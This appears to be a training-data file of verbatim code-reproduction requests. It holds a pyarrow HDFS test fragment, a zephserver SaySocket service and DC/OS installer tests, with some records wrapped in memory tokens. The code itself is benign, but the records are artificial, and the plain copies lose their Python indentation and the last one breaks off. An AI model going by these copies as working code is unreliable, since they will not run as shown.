port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))
except ValueError:
raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '
'an integer')
uri = "hdfs://{}:{}{}".format(host, port, path)
return uri
@pytest.mark.hdfs
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.fastparquet
def test_fastparquet_read_with_hdfs():
from pandas.testing import assert_frame_equal
try:
import snappy # noqa
except ImportError:
pytest.skip('fastparquet test requires snappy')
import pyarrow.parquet as pq
fastparquet = pytest.importorskip('fastparquet')
fs = hdfs_test_client()
df = util.make_dataframe()
table = pa.Table.from_pandas(df)
path = '/tmp/testing.parquet'
with fs.open(path, 'wb') as f:
pq.write_table(table, f)
parquet_file = fastparquet.ParquetFile(path, open_with=fs.open)
result = parquet_file.to_pandas()
assert_frame_equal(result, df)
```
|
[
{
"content": "```python\nimport logging\nfrom zephserver.infra.service_manager import ServiceManager\nfrom zephserver.service.service_interface import ServiceInterface\n\nfrom zephserver.infra.cluster_adapter import ClusterAdapter\nfrom zephserversettings import MY_ROOM_HANDLER\nfrom threading import Thread, Event, Lock\n\nclass SaySocket(ServiceInterface):\n\t\n\t_room_handler = None\n\t_cluster = None\n\t_shutdown_event = Event()\n\t\n\tdef main(self):\n\t\tself._room_handler = ServiceManager.get_instance().get_service(MY_ROOM_HANDLER)\n\t\tself._cluster = ClusterAdapter.get_instance()\n\t\tself._cluster.subscribe('say_socket_send', self.say_cluster_callback)\n\t\tlogging.info('launching SaySocket service')\n\t\tself._shutdown_event.wait()\n\t\tself._shutdown_event.clear()\n\t\t\n\t\n\tdef say(self, answer, from_cluster=False):\n\t\tif 'cid' not in answer and not from_cluster:\n\t\t\tself._cluster.send('say_socket_send', answer)\n\t\tif 'room' in answer:\n\t\t\tself._room_handler.send_to_room(answer[\"room\"], answer)\n\t\telif 'users' in answer:\n\t\t\tself._room_handler.send_to_users(answer[\"users\"], answer)\n\t\telif 'all' in answer:\n\t\t\tself._room_handler.send_to_all( answer)\n\t\telif 'cid' in answer:\n\t\t\tself._room_handler.send_to_cid(answer[\"cid\"], answer)\n\t\n\tdef say_cluster_callback(self, cluster_data):\n\t\tself.say(cluster_data['data'], True)\n\t\n\tdef disable(self):\n\t\tlogging.warning('asking to stop SaySocket service')\n\t\tself._shutdown_event.set()\n```\nProduce the code text exactly, no additions or omissions.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport logging\nfrom zephserver.infra.service_manager import ServiceManager\nfrom zephserver.service.service_interface import ServiceInterface\n\nfrom zephserver.infra.cluster_adapter import ClusterAdapter\nfrom zephserversettings import MY_ROOM_HANDLER\nfrom threading import Thread, Event, Lock\n\nclass SaySocket(ServiceInterface):\n\t\n\t_room_handler = None\n\t_cluster = None\n\t_shutdown_event = Event()\n\t\n\tdef main(self):\n\t\tself._room_handler = ServiceManager.get_instance().get_service(MY_ROOM_HANDLER)\n\t\tself._cluster = ClusterAdapter.get_instance()\n\t\tself._cluster.subscribe('say_socket_send', self.say_cluster_callback)\n\t\tlogging.info('launching SaySocket service')\n\t\tself._shutdown_event.wait()\n\t\tself._shutdown_event.clear()\n\t\t\n\t\n\tdef say(self, answer, from_cluster=False):\n\t\tif 'cid' not in answer and not from_cluster:\n\t\t\tself._cluster.send('say_socket_send', answer)\n\t\tif 'room' in answer:\n\t\t\tself._room_handler.send_to_room(answer[\"room\"], answer)\n\t\telif 'users' in answer:\n\t\t\tself._room_handler.send_to_users(answer[\"users\"], answer)\n\t\telif 'all' in answer:\n\t\t\tself._room_handler.send_to_all( answer)\n\t\telif 'cid' in answer:\n\t\t\tself._room_handler.send_to_cid(answer[\"cid\"], answer)\n\t\n\tdef say_cluster_callback(self, cluster_data):\n\t\tself.say(cluster_data['data'], True)\n\t\n\tdef disable(self):\n\t\tlogging.warning('asking to stop SaySocket service')\n\t\tself._shutdown_event.set()\n```<|memory_end|>\nProduce the code text exactly, no additions or omissions.",
"role": "user"
}
] |
```python
import logging
from zephserver.infra.service_manager import ServiceManager
from zephserver.service.service_interface import ServiceInterface
from zephserver.infra.cluster_adapter import ClusterAdapter
from zephserversettings import MY_ROOM_HANDLER
from threading import Thread, Event, Lock
class SaySocket(ServiceInterface):
_room_handler = None
_cluster = None
_shutdown_event = Event()
def main(self):
self._room_handler = ServiceManager.get_instance().get_service(MY_ROOM_HANDLER)
self._cluster = ClusterAdapter.get_instance()
self._cluster.subscribe('say_socket_send', self.say_cluster_callback)
logging.info('launching SaySocket service')
self._shutdown_event.wait()
self._shutdown_event.clear()
def say(self, answer, from_cluster=False):
if 'cid' not in answer and not from_cluster:
self._cluster.send('say_socket_send', answer)
if 'room' in answer:
self._room_handler.send_to_room(answer["room"], answer)
elif 'users' in answer:
self._room_handler.send_to_users(answer["users"], answer)
elif 'all' in answer:
self._room_handler.send_to_all( answer)
elif 'cid' in answer:
self._room_handler.send_to_cid(answer["cid"], answer)
def say_cluster_callback(self, cluster_data):
self.say(cluster_data['data'], True)
def disable(self):
logging.warning('asking to stop SaySocket service')
self._shutdown_event.set()
```
|
[
{
"content": "Replicate the source code:\n```python\nimport json\nimport logging\nimport os\nimport subprocess\nimport textwrap\nimport uuid\n\nimport boto3\nimport passlib.hash\nimport pytest\n\nfrom dcos_installer import backend\nfrom dcos_installer.config import Config, make_default_config_if_needed, to_config\n\nos.environ[\"BOOTSTRAP_ID\"] = \"12345\"\n\n\ndef test_password_hash():\n \"\"\"Tests that the password hashing method creates de-cryptable hash\n \"\"\"\n password = 'DcosTestingPassword!@#'\n # only reads from STDOUT\n hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])\n print(hash_pw)\n hash_pw = hash_pw.decode('ascii').strip('\\n')\n assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'\n\n\ndef test_set_superuser_password(tmpdir):\n \"\"\"Test that --set-superuser-hash works\"\"\"\n\n with tmpdir.as_cwd():\n tmpdir.join('genconf').ensure(dir=True)\n\n # TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml\n\n # Setting in a non-empty config.yaml which has no password set\n make_default_config_if_needed('genconf/config.yaml')\n assert 'superuser_password_hash' not in Config('genconf/config.yaml').config\n\n # Set the password\n create_fake_build_artifacts(tmpdir)\n subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))\n\n # Check that config.yaml has the password set\n config = Config('genconf/config.yaml')\n assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])\n\n\ndef test_generate_node_upgrade_script(tmpdir, monkeypatch):\n upgrade_config = \"\"\"\n---\n# The name of your DC/OS cluster. Visable in the DC/OS user interface.\ncluster_name: 'DC/OS'\nmaster_discovery: static\nexhibitor_storage_backend: 'static'\nresolvers:\n- 8.8.8.8\n- 8.8.4.4\nssh_port: 22\nprocess_timeout: 10000\nbootstrap_url: file:///opt/dcos_install_tmp\nmaster_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']\n\"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', '')\n create_config(upgrade_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n\n output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))\n assert output.decode('utf-8').splitlines()[-1].split(\"Node upgrade script URL: \", 1)[1]\\\n .endswith(\"dcos_node_upgrade.sh\")\n\n try:\n subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))\n except subprocess.CalledProcessError as e:\n print(e.output)\n assert e.output.decode('ascii') == \"Must provide the version of the cluster upgrading from\\n\"\n else:\n raise Exception(\"Test passed, this should not pass without specifying a version number\")\n\n\ndef test_version(monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')\n version_data = subprocess.check_output(['dcos_installer', '--version']).decode()\n assert json.loads(version_data) == {\n 'version': '1.12-dev',\n 'variant': 'some-variant'\n }\n\n\ndef test_good_create_config_from_post(tmpdir):\n \"\"\"\n Test that it creates the config\n \"\"\"\n # Create a temp config\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n\n temp_ip_detect_path = workspace + '/ip-detect'\n f = open(temp_ip_detect_path, \"w\")\n f.write(\"#/bin/bash foo\")\n\n good_post_data = {\n \"agent_list\": [\"10.0.0.2\"],\n \"master_list\": [\"10.0.0.1\"],\n \"cluster_name\": \"Good Test\",\n \"resolvers\": [\"4.4.4.4\"],\n \"ip_detect_filename\": temp_ip_detect_path\n }\n expected_good_messages = {}\n\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=good_post_data,\n config_path=temp_config_path)\n\n assert messages == expected_good_messages\n\n\ndef test_bad_create_config_from_post(tmpdir):\n # Create a temp config\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n\n bad_post_data = {\n \"agent_list\": \"foo\",\n \"master_list\": [\"foo\"],\n }\n expected_bad_messages = {\n \"agent_list\": \"Must be a JSON formatted list, but couldn't be parsed the given value `foo` as \"\n \"one because of: Expecting value: line 1 column 1 (char 0)\",\n \"master_list\": 'Invalid IPv4 addresses in list: foo',\n }\n\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=bad_post_data,\n config_path=temp_config_path)\n\n assert messages == expected_bad_messages\n\n\ndef test_do_validate_config(tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n\n # Create a temp config\n genconf_dir = tmpdir.join('genconf')\n genconf_dir.ensure(dir=True)\n temp_config_path = str(genconf_dir.join('config.yaml'))\n\n # Initialize with defautls\n make_default_config_if_needed(temp_config_path)\n\n create_fake_build_artifacts(tmpdir)\n expected_output = {\n 'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',\n 'ssh_user': 'Must set ssh_user, no way to calculate value.',\n 'master_list': 'Must set master_list, no way to calculate value.',\n 'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'\n }\n with tmpdir.as_cwd():\n assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output\n\n\ndef test_get_config(tmpdir):\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n\n expected_data = {\n 'cluster_name': 'DC/OS',\n 'master_discovery': 'static',\n 'exhibitor_storage_backend': 'static',\n 'resolvers': ['8.8.8.8', '8.8.4.4'],\n 'ssh_port': 22,\n 'process_timeout': 10000,\n 'bootstrap_url': 'file:///opt/dcos_install_tmp'\n }\n\n make_default_config_if_needed(temp_config_path)\n config = Config(temp_config_path)\n assert expected_data == config.config\n\n\ndef test_determine_config_type(tmpdir):\n # Ensure the default created config is of simple type\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n got_output = backend.determine_config_type(config_path=temp_config_path)\n expected_output = {\n 'message': '',\n 'type': 'minimal',\n }\n assert got_output == expected_output\n\n\ndef test_success():\n mock_config = to_config({\n 'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],\n 'agent_list': ['10.0.0.3', '10.0.0.4']\n })\n expected_output = {\n \"success\": \"http://10.0.0.1\",\n \"master_count\": 3,\n \"agent_count\": 2\n }\n expected_output_bad = {\n \"success\": \"\",\n \"master_count\": 0,\n \"agent_count\": 0\n }\n got_output, code = backend.success(mock_config)\n mock_config.update({'master_list': '', 'agent_list': ''})\n bad_out, bad_code = backend.success(mock_config)\n\n assert got_output == expected_output\n assert code == 200\n assert bad_out == expected_output_bad\n assert bad_code == 400\n\n\ndef test_accept_overrides_for_undefined_config_params(tmpdir):\n temp_config_path = tmpdir.strpath + '/config.yaml'\n param = ('fake_test_param_name', 'fake_test_param_value')\n make_default_config_if_needed(temp_config_path)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=dict([param]),\n config_path=temp_config_path)\n\n assert not messages, \"unexpected validation error: {}\".format(messages)\n assert Config(config_path=temp_config_path)[param[0]] == param[1]\n\n\nsimple_full_config = \"\"\"---\ncluster_name: DC/OS\nmaster_discovery: static\nexhibitor_storage_backend: static\nmaster_list:\n - 127.0.0.1\nbootstrap_url: http://example.com\n\"\"\"\n\n\ndef test_do_configure(tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(simple_full_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 0\n\n\naws_base_config = \"\"\"---\n# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /\n# s3 credentials in this configuration.\naws_template_storage_bucket: psychic\naws_template_storage_bucket_path: mofo-the-gorilla\naws_template_storage_region_name: us-west-2\naws_template_upload: false\n\"\"\"\n\n\ndef test_do_aws_configure(release_config_aws, tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(aws_base_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n\n with tmpdir.as_cwd():\n assert backend.do_aws_cf_configure() == 0\n\n\[email protected]\ndef valid_storage_config(release_config_aws):\n \"\"\" Uses the settings from dcos-release.config.yaml ['testing'] to create a\n new upload and then deletes it when the test is over\n \"\"\"\n s3_bucket_name = release_config_aws['bucket']\n bucket_path = str(uuid.uuid4())\n yield \"\"\"---\nmaster_list:\n - 127.0.0.1\naws_template_storage_bucket: {bucket}\naws_template_storage_bucket_path: {bucket_path}\naws_template_upload: true\n\"\"\".format(\n bucket=release_config_aws['bucket'],\n bucket_path=bucket_path)\n session = boto3.session.Session()\n s3 = session.resource('s3')\n s3_bucket = s3.Bucket(s3_bucket_name)\n for o in s3_bucket.objects.filter(Prefix=bucket_path):\n o.delete()\n\n\ndef test_do_aws_cf_configure_valid_storage_config(release_config_aws, valid_storage_config, tmpdir, monkeypatch):\n assert aws_cf_configure(valid_storage_config, tmpdir, monkeypatch) == 0\n # TODO: add an assertion that the config that was resolved inside do_aws_cf_configure\n # ended up with the correct region where the above testing bucket was created.\n\n\ndef test_override_aws_template_storage_region_name(release_config_aws, valid_storage_config, tmpdir, monkeypatch):\n config_str = valid_storage_config\n config_str += '\\naws_template_storage_region_name: {}'.format(os.environ['AWS_DEFAULT_REGION'])\n assert aws_cf_configure(config_str, tmpdir, monkeypatch) == 0\n\n\ndef aws_cf_configure(config, tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n\n create_config(config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n return backend.do_aws_cf_configure()\n\n\ndef test_do_configure_valid_config_no_duplicate_logging(tmpdir, monkeypatch, caplog):\n \"\"\"\n Log messages are logged exactly once.\n \"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(simple_full_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 0\n\n # The message comes from gen.get_dcosconfig_source_target_and_templates() function\n expected_message = 'Generating configuration files...'\n filtered_messages = [rec.message for rec in caplog.records if rec.message == expected_message]\n assert [expected_message] == filtered_messages\n\n\ndef test_do_configure_logs_validation_errors(tmpdir, monkeypatch, caplog):\n \"\"\"\n Configuration validation errors are logged as `error` messages.\n \"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n invalid_config = textwrap.dedent(\"\"\"---\n cluster_name: DC/OS\n master_discovery: static\n # Remove `exhibitor_storage_backend` from configuration\n # exhibitor_storage_backend: static\n master_list:\n - 127.0.0.1\n bootstrap_url: http://example.com\n \"\"\")\n create_config(invalid_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 1\n\n expected_error_message = (\n 'exhibitor_storage_backend: Must set exhibitor_storage_backend, '\n 'no way to calculate value.'\n )\n error_logs = [rec for rec in caplog.records if rec.message == expected_error_message]\n assert len(error_logs) == 1\n\n error_log = error_logs[0]\n assert error_log.levelno == logging.ERROR\n\n\ndef create_config(config_str, tmpdir):\n genconf_dir = tmpdir.join('genconf')\n genconf_dir.ensure(dir=True)\n config_path = genconf_dir.join('config.yaml')\n config_path.write(config_str)\n genconf_dir.join('ip-detect').write('#!/bin/bash\\necho 127.0.0.1')\n\n\ndef create_fake_build_artifacts(tmpdir):\n artifact_dir = tmpdir.join('artifacts/bootstrap')\n artifact_dir.ensure(dir=True)\n artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)\n artifact_dir.join('12345.active.json').write('[\"package--version\"]', ensure=True)\n artifact_dir.join('test_variant.bootstrap.latest').write(\"12345\")\n tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(\n '{\"bootstrap\": \"12345\", \"packages\": [\"package--version\"]}',\n ensure=True,\n )\n tmpdir.join('artifacts/complete/complete.latest.json').write(\n '{\"bootstrap\": \"12345\", \"packages\": [\"package--version\"]}',\n ensure=True,\n )\n tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)\n```\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
[
{
"content": "Replicate the source code:\n<|memory_start|>```python\nimport json\nimport logging\nimport os\nimport subprocess\nimport textwrap\nimport uuid\n\nimport boto3\nimport passlib.hash\nimport pytest\n\nfrom dcos_installer import backend\nfrom dcos_installer.config import Config, make_default_config_if_needed, to_config\n\nos.environ[\"BOOTSTRAP_ID\"] = \"12345\"\n\n\ndef test_password_hash():\n \"\"\"Tests that the password hashing method creates de-cryptable hash\n \"\"\"\n password = 'DcosTestingPassword!@#'\n # only reads from STDOUT\n hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])\n print(hash_pw)\n hash_pw = hash_pw.decode('ascii').strip('\\n')\n assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'\n\n\ndef test_set_superuser_password(tmpdir):\n \"\"\"Test that --set-superuser-hash works\"\"\"\n\n with tmpdir.as_cwd():\n tmpdir.join('genconf').ensure(dir=True)\n\n # TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml\n\n # Setting in a non-empty config.yaml which has no password set\n make_default_config_if_needed('genconf/config.yaml')\n assert 'superuser_password_hash' not in Config('genconf/config.yaml').config\n\n # Set the password\n create_fake_build_artifacts(tmpdir)\n subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))\n\n # Check that config.yaml has the password set\n config = Config('genconf/config.yaml')\n assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])\n\n\ndef test_generate_node_upgrade_script(tmpdir, monkeypatch):\n upgrade_config = \"\"\"\n---\n# The name of your DC/OS cluster. Visable in the DC/OS user interface.\ncluster_name: 'DC/OS'\nmaster_discovery: static\nexhibitor_storage_backend: 'static'\nresolvers:\n- 8.8.8.8\n- 8.8.4.4\nssh_port: 22\nprocess_timeout: 10000\nbootstrap_url: file:///opt/dcos_install_tmp\nmaster_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']\n\"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', '')\n create_config(upgrade_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n\n output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))\n assert output.decode('utf-8').splitlines()[-1].split(\"Node upgrade script URL: \", 1)[1]\\\n .endswith(\"dcos_node_upgrade.sh\")\n\n try:\n subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))\n except subprocess.CalledProcessError as e:\n print(e.output)\n assert e.output.decode('ascii') == \"Must provide the version of the cluster upgrading from\\n\"\n else:\n raise Exception(\"Test passed, this should not pass without specifying a version number\")\n\n\ndef test_version(monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')\n version_data = subprocess.check_output(['dcos_installer', '--version']).decode()\n assert json.loads(version_data) == {\n 'version': '1.12-dev',\n 'variant': 'some-variant'\n }\n\n\ndef test_good_create_config_from_post(tmpdir):\n \"\"\"\n Test that it creates the config\n \"\"\"\n # Create a temp config\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n\n temp_ip_detect_path = workspace + '/ip-detect'\n f = open(temp_ip_detect_path, \"w\")\n f.write(\"#/bin/bash foo\")\n\n good_post_data = {\n \"agent_list\": [\"10.0.0.2\"],\n \"master_list\": [\"10.0.0.1\"],\n \"cluster_name\": \"Good Test\",\n \"resolvers\": [\"4.4.4.4\"],\n \"ip_detect_filename\": temp_ip_detect_path\n }\n expected_good_messages = {}\n\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=good_post_data,\n config_path=temp_config_path)\n\n assert messages == expected_good_messages\n\n\ndef test_bad_create_config_from_post(tmpdir):\n # Create a temp config\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n\n bad_post_data = {\n \"agent_list\": \"foo\",\n \"master_list\": [\"foo\"],\n }\n expected_bad_messages = {\n \"agent_list\": \"Must be a JSON formatted list, but couldn't be parsed the given value `foo` as \"\n \"one because of: Expecting value: line 1 column 1 (char 0)\",\n \"master_list\": 'Invalid IPv4 addresses in list: foo',\n }\n\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=bad_post_data,\n config_path=temp_config_path)\n\n assert messages == expected_bad_messages\n\n\ndef test_do_validate_config(tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n\n # Create a temp config\n genconf_dir = tmpdir.join('genconf')\n genconf_dir.ensure(dir=True)\n temp_config_path = str(genconf_dir.join('config.yaml'))\n\n # Initialize with defautls\n make_default_config_if_needed(temp_config_path)\n\n create_fake_build_artifacts(tmpdir)\n expected_output = {\n 'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',\n 'ssh_user': 'Must set ssh_user, no way to calculate value.',\n 'master_list': 'Must set master_list, no way to calculate value.',\n 'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'\n }\n with tmpdir.as_cwd():\n assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output\n\n\ndef test_get_config(tmpdir):\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n\n expected_data = {\n 'cluster_name': 'DC/OS',\n 'master_discovery': 'static',\n 'exhibitor_storage_backend': 'static',\n 'resolvers': ['8.8.8.8', '8.8.4.4'],\n 'ssh_port': 22,\n 'process_timeout': 10000,\n 'bootstrap_url': 'file:///opt/dcos_install_tmp'\n }\n\n make_default_config_if_needed(temp_config_path)\n config = Config(temp_config_path)\n assert expected_data == config.config\n\n\ndef test_determine_config_type(tmpdir):\n # Ensure the default created config is of simple type\n workspace = tmpdir.strpath\n temp_config_path = workspace + '/config.yaml'\n make_default_config_if_needed(temp_config_path)\n got_output = backend.determine_config_type(config_path=temp_config_path)\n expected_output = {\n 'message': '',\n 'type': 'minimal',\n }\n assert got_output == expected_output\n\n\ndef test_success():\n mock_config = to_config({\n 'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],\n 'agent_list': ['10.0.0.3', '10.0.0.4']\n })\n expected_output = {\n \"success\": \"http://10.0.0.1\",\n \"master_count\": 3,\n \"agent_count\": 2\n }\n expected_output_bad = {\n \"success\": \"\",\n \"master_count\": 0,\n \"agent_count\": 0\n }\n got_output, code = backend.success(mock_config)\n mock_config.update({'master_list': '', 'agent_list': ''})\n bad_out, bad_code = backend.success(mock_config)\n\n assert got_output == expected_output\n assert code == 200\n assert bad_out == expected_output_bad\n assert bad_code == 400\n\n\ndef test_accept_overrides_for_undefined_config_params(tmpdir):\n temp_config_path = tmpdir.strpath + '/config.yaml'\n param = ('fake_test_param_name', 'fake_test_param_value')\n make_default_config_if_needed(temp_config_path)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n messages = backend.create_config_from_post(\n post_data=dict([param]),\n config_path=temp_config_path)\n\n assert not messages, \"unexpected validation error: {}\".format(messages)\n assert Config(config_path=temp_config_path)[param[0]] == param[1]\n\n\nsimple_full_config = \"\"\"---\ncluster_name: DC/OS\nmaster_discovery: static\nexhibitor_storage_backend: static\nmaster_list:\n - 127.0.0.1\nbootstrap_url: http://example.com\n\"\"\"\n\n\ndef test_do_configure(tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(simple_full_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 0\n\n\naws_base_config = \"\"\"---\n# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /\n# s3 credentials in this configuration.\naws_template_storage_bucket: psychic\naws_template_storage_bucket_path: mofo-the-gorilla\naws_template_storage_region_name: us-west-2\naws_template_upload: false\n\"\"\"\n\n\ndef test_do_aws_configure(release_config_aws, tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(aws_base_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n\n with tmpdir.as_cwd():\n assert backend.do_aws_cf_configure() == 0\n\n\[email protected]\ndef valid_storage_config(release_config_aws):\n \"\"\" Uses the settings from dcos-release.config.yaml ['testing'] to create a\n new upload and then deletes it when the test is over\n \"\"\"\n s3_bucket_name = release_config_aws['bucket']\n bucket_path = str(uuid.uuid4())\n yield \"\"\"---\nmaster_list:\n - 127.0.0.1\naws_template_storage_bucket: {bucket}\naws_template_storage_bucket_path: {bucket_path}\naws_template_upload: true\n\"\"\".format(\n bucket=release_config_aws['bucket'],\n bucket_path=bucket_path)\n session = boto3.session.Session()\n s3 = session.resource('s3')\n s3_bucket = s3.Bucket(s3_bucket_name)\n for o in s3_bucket.objects.filter(Prefix=bucket_path):\n o.delete()\n\n\ndef test_do_aws_cf_configure_valid_storage_config(release_config_aws, valid_storage_config, tmpdir, monkeypatch):\n assert aws_cf_configure(valid_storage_config, tmpdir, monkeypatch) == 0\n # TODO: add an assertion that the config that was resolved inside do_aws_cf_configure\n # ended up with the correct region where the above testing bucket was created.\n\n\ndef test_override_aws_template_storage_region_name(release_config_aws, valid_storage_config, tmpdir, monkeypatch):\n config_str = valid_storage_config\n config_str += '\\naws_template_storage_region_name: {}'.format(os.environ['AWS_DEFAULT_REGION'])\n assert aws_cf_configure(config_str, tmpdir, monkeypatch) == 0\n\n\ndef aws_cf_configure(config, tmpdir, monkeypatch):\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n\n create_config(config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n return backend.do_aws_cf_configure()\n\n\ndef test_do_configure_valid_config_no_duplicate_logging(tmpdir, monkeypatch, caplog):\n \"\"\"\n Log messages are logged exactly once.\n \"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n create_config(simple_full_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 0\n\n # The message comes from gen.get_dcosconfig_source_target_and_templates() function\n expected_message = 'Generating configuration files...'\n filtered_messages = [rec.message for rec in caplog.records if rec.message == expected_message]\n assert [expected_message] == filtered_messages\n\n\ndef test_do_configure_logs_validation_errors(tmpdir, monkeypatch, caplog):\n \"\"\"\n Configuration validation errors are logged as `error` messages.\n \"\"\"\n monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')\n invalid_config = textwrap.dedent(\"\"\"---\n cluster_name: DC/OS\n master_discovery: static\n # Remove `exhibitor_storage_backend` from configuration\n # exhibitor_storage_backend: static\n master_list:\n - 127.0.0.1\n bootstrap_url: http://example.com\n \"\"\")\n create_config(invalid_config, tmpdir)\n create_fake_build_artifacts(tmpdir)\n with tmpdir.as_cwd():\n assert backend.do_configure(config_path='genconf/config.yaml') == 1\n\n expected_error_message = (\n 'exhibitor_storage_backend: Must set exhibitor_storage_backend, '\n 'no way to calculate value.'\n )\n error_logs = [rec for rec in caplog.records if rec.message == expected_error_message]\n assert len(error_logs) == 1\n\n error_log = error_logs[0]\n assert error_log.levelno == logging.ERROR\n\n\ndef create_config(config_str, tmpdir):\n genconf_dir = tmpdir.join('genconf')\n genconf_dir.ensure(dir=True)\n config_path = genconf_dir.join('config.yaml')\n config_path.write(config_str)\n genconf_dir.join('ip-detect').write('#!/bin/bash\\necho 127.0.0.1')\n\n\ndef create_fake_build_artifacts(tmpdir):\n artifact_dir = tmpdir.join('artifacts/bootstrap')\n artifact_dir.ensure(dir=True)\n artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)\n artifact_dir.join('12345.active.json').write('[\"package--version\"]', ensure=True)\n artifact_dir.join('test_variant.bootstrap.latest').write(\"12345\")\n tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(\n '{\"bootstrap\": \"12345\", \"packages\": [\"package--version\"]}',\n ensure=True,\n )\n tmpdir.join('artifacts/complete/complete.latest.json').write(\n '{\"bootstrap\": \"12345\", \"packages\": [\"package--version\"]}',\n ensure=True,\n )\n tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)\n```<|memory_end|>\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
```python
import json
import logging
import os
import subprocess
import textwrap
import uuid
import boto3
import passlib.hash
